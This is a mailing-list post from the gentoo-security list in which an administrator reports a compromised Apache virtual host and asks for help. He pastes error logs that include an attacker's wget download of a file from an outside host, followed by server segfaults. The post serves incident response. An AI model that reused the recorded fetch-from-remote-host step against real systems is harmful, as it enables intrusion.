1 |
Hi all security gurus, |
2 |
|
3 |
recently I had a sec. issue with an Apache install. This box is hosting |
4 |
several virtual domains, one was hacked last night :( |
5 |
|
6 |
I found this in my apache-error: |
7 |
|
8 |
===<snip>======================================================== |
9 |
sh: line 1: cd: conf: No such file or directory |
10 |
sh: line 1: cd: conf: No such file or directory |
11 |
sh: line 1: cd: conf: No such file or directory |
12 |
sh: line 1: cd: conf: No such file or directory |
13 |
sh: line 1: work.txt: Permission denied |
14 |
cat: /tmp/cmdtemp: No such file or directory |
15 |
rm: cannot remove `/tmp/cmdtemp': No such file or directory |
16 |
--00:11:27-- http://www.massdesign.hpg.com.br/index/index2.htt |
17 |
=> `index2.htt' |
18 |
Resolving www.massdesign.hpg.com.br... done. |
19 |
Connecting to www.massdesign.hpg.com.br[200.226.137.9]:80... connected. |
20 |
HTTP request sent, awaiting response... 302 Found |
21 |
Location: http://www.massdesign.hpg.ig.com.br/index/index2.htt [following] |
22 |
--00:11:28-- http://www.massdesign.hpg.ig.com.br/index/index2.htt |
23 |
=> `index2.htt' |
24 |
Resolving www.massdesign.hpg.ig.com.br... done. |
25 |
Connecting to www.massdesign.hpg.ig.com.br[200.226.137.10]:80... connected. |
26 |
HTTP request sent, awaiting response... 200 OK |
27 |
Length: 871 [text/plain] |
28 |
|
29 |
0K 100% 850.59 |
30 |
KB/s |
31 |
|
32 |
00:11:29 (850.59 KB/s) - `index2.htt' saved [871/871] |
33 |
===</snip>======================================================== |
34 |
|
35 |
Then some more wgets and this line: |
36 |
|
37 |
===<snip>======================================================== |
38 |
[Mon Feb 2 00:42:39 2004] [error] [client 201.4.61.139] request failed: |
39 |
erroneous characters after protocol string: HEAD / HTTP\\1.0 |
40 |
===</snip>======================================================== |
41 |
|
42 |
I had to manually restart the webserver this morning, but now I get some of |
43 |
those: |
44 |
|
45 |
===<snip>======================================================== |
46 |
[Mon Feb 2 13:54:48 2004] [notice] child pid 151 exit signal Segmentation |
47 |
fault (11) |
48 |
[Mon Feb 2 13:55:13 2004] [notice] child pid 155 exit signal Segmentation |
49 |
fault (11) |
50 |
[Mon Feb 2 13:56:09 2004] [notice] child pid 152 exit signal Segmentation |
51 |
fault (11) |
52 |
[Mon Feb 2 13:56:36 2004] [notice] child pid 2321 exit signal Segmentation |
53 |
fault (11) |
54 |
[Mon Feb 2 13:58:10 2004] [notice] child pid 2391 exit signal Segmentation |
55 |
fault (11) |
56 |
[Mon Feb 2 13:58:46 2004] [notice] child pid 107 exit signal Segmentation |
57 |
fault (11) |
58 |
[Mon Feb 2 13:59:07 2004] [notice] child pid 2358 exit signal Segmentation |
59 |
fault (11) |
60 |
[Mon Feb 2 13:59:08 2004] [notice] child pid 106 exit signal Segmentation |
61 |
fault (11) |
62 |
[Mon Feb 2 14:00:04 2004] [notice] child pid 104 exit signal Segmentation |
63 |
fault (11) |
64 |
[Mon Feb 2 14:00:43 2004] [notice] child pid 154 exit signal Segmentation |
65 |
fault (11) |
66 |
[Mon Feb 2 14:01:06 2004] [notice] child pid 105 exit signal Segmentation |
67 |
fault (11) |
68 |
===</snip>======================================================== |
69 |
|
70 |
... and more and more ... |
71 |
|
72 |
Until I can update the webserver, I need to know 3 things: |
73 |
1.) how could this guy(s) could get access to this machine, |
74 |
2.) how can one get shell access after exploitng Apache, and |
75 |
3.) how to prevent similar attacks in the future? |
76 |
|
77 |
ANY hints, tips, links and suggestions are welcome! |
78 |
Greetings and TIA, Matthias |
79 |
|
80 |
-- |
81 |
Man: You must be stupider than you look. |
82 |
|
83 |
Homer: Stupider like a fix! |
84 |
|
85 |
Lemon of Troy |
86 |
|
87 |
|
88 |
-- |
89 |
gentoo-security@g.o mailing list |